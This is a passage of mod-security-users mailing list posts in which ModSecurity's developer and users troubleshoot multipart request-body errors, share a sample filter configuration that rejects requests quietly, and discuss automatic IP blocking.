  the browser ("User-Agent: Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)")
  is broken.


> mod_security-message: Access denied with code 500. Error processing
> request body: Multipart: invalid boundary encountered:
> -----------------------------047485629054451\x0a

  According to the spec all lines must end in CRLF. In the above case the
  CR (\x0d) is missing.

  You can disable request body buffering for that user alone to
  work around the problem.

  Considering there is a steady number of multipart-related problems
  I will consider adding options to allow fine control of the multipart
  parser.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] Error processing request body: Multipart: invalid boundary encountered

[Sebastian W. <mod...@tr...>]

Hi,

I'm getting the following error while a user is trying to edit a page
in Typo3. Any suggestions where it comes from:

POST /~user/typo3/alt_doc.php?&returnUrl=%2F%7Euser%2Ftypo3%2Fsysext%2Fcms%2Flayout%2Fdb_layout.php%3F%26id%3D240%26id%3D248&edit[pages][248]=edit&returnNewPageId=1 HTTP/1.1
Host: server
Accept: */*
Accept-Language: en
Pragma: no-cache
Connection: Keep-Alive
Referer: http://server/~user/typo3/alt_doc.php?&returnUrl=%2F%7Euser%2Ftypo3%2Fsysext%2Fcms%2Flayout%2Fdb_layout.php%3F%26id%3D240&edit[pages][-240]=new&returnNewPageId=1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
UA-OS: MacOS
UA-CPU: PPC
Cookie: XXX
Content-type: multipart/form-data; boundary=---------------------------047485629054451
Extension: Security/Remote-Passphrase
Content-length: 7498
mod_security-message: Access denied with code 500. Error processing request body: Multipart: invalid boundary encountered: -----------------------------047485629054451\x0a
mod_security-action: 500

28
[POST payload not available]

HTTP/1.1 500 Internal Server Error
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
--a9662f62--

Regards,

Sebastian

-- 
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Wehret den Anfaengen: http://odem.org/informationsfreiheit/
'Are you Death?' ... IT'S THE SCYTHE, ISN'T IT? PEOPLE ALWAYS NOTICE THE SCYTHE.
            -- Terry Pratchett, The Fifth Elephant

[mod-security-users] Apache 2.2

[<apa...@gm...>]

Is ModSecurity tested on Apache 2.2?

Re: [mod-security-users] Multipart: invalid Content-Disposition header (-11)?

[Ivan R. <iv...@we...>]

Gerwin Krist -|- Digitalus Webhosting wrote:
> Hmmm well I dunno exactly whats this customer is using. I figured out
> that customer is using Jupload (http://jupload.biz/) .

  I think JUpload is wrong here, but I've contacted the developers
  to see if they are actually using that parameter for anything.

  I will also consider whether accepting unknown header parameters
  is dangerous or not. Maybe I can relax mod_security checks. ModSecurity
  is strict to reduce the possibility of someone exploiting impedance
  mismatch in parsing.

  In the meantime: commenting out the line "else return -11;" (in
  the ModSecurity source code, of course) should allow the request
  through.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] filtering with no log

[Ivan R. <iv...@we...>]

David De Maeyer wrote:
> Hi all,
> 
> I have installed mod_security on one of our corporate
> servers (mod_security: 1.9.2, apache: 2.0.55, OS:
> FreeBSD 6, PHP: 5.1.2) and it works fine.
> 
> I first installed mod_security for its ability to log
> POST requests. This works fine for me.
> 
> I was wondering if I could use it for filtering and
> rejecting all the requests which are not
> identified/addressed by/to a specific web application;
> logging only the successful requests into access.log.
> 
> Say a client sends a POST request containing a
> variable "origin" to a PHP script called "test.php"
> served by the server on which mod_security is
> installed and configured.

  How about this:

  # deny everything quietly
  SecFilterSelective REMOTE_ADDR !^$ deny,status:404,nolog

  # apply special rules to /test.php only
  <Location /test.php>
      # start with no rules
      SecFilterInheritance Off

      # you did say "POST" only, right?
      SecFilterSelective REQUEST_METHOD "^POST$" chain
      # variable "origin" not empty
      SecFilterSelective ARG_origin !^$ allow,nolog,setenv:valid_request

      # deny everything else quietly
      SecFilterSelective REMOTE_ADDR !^$ deny,status:404,nolog
  </Location>

  # Custom Apache log that logs only accepted requests
  CustomLog logs/custom_access_log \
  "%h %l %u %t \"%r\" %>s %b" \
  env=valid_request

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] Automatically Add to Deny Hosts

[Ivan R. <iv...@we...>]

Achim Hoffmann wrote:
> On Thu, 16 Feb 2006, Ivan Ristic wrote:
> !! John Thomas wrote:
> !! > Is there a way to automagically add these *&*&^ to my host.deny file?
> !!
> !!   Not without a little bit of work: you could configure SEC (Simple Event
> !!   Correlator) to watch the error log and act on the information seen there.
> 
> hmm, should be simple with using mod_security's exec action, which calls a
> script to manage those IPs and add/remove the corresponding firewall rules.
> I'd never recommend to do that 'cause it most likely ends up in a performance
> nightmare

  Correct, that's why I recommended the use of SEC in the first place :)


> (beside the additional work to do to remove the firewall rules)

  Both "blacklist" and SnortSam (I believe) are capable of blacking
  IP addresses for a limited period only.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] Automatically Add to Deny Hosts

[Achim H. <ki...@se...>]

On Thu, 16 Feb 2006, Ivan Ristic wrote:
!! John Thomas wrote:
!! > Is there a way to automagically add these *&*&^ to my host.deny file?
!!
!!   Not without a little bit of work: you could configure SEC (Simple Event
!!   Correlator) to watch the error log and act on the information seen there.

hmm, should be simple with using mod_security's exec action, which calls a
script to manage those IPs and add/remove the corresponding firewall rules.
I'd never recommend to do that 'cause it most likely ends up in a performance
nightmare (beside the additional work to do to remove the firewall rules)

Achim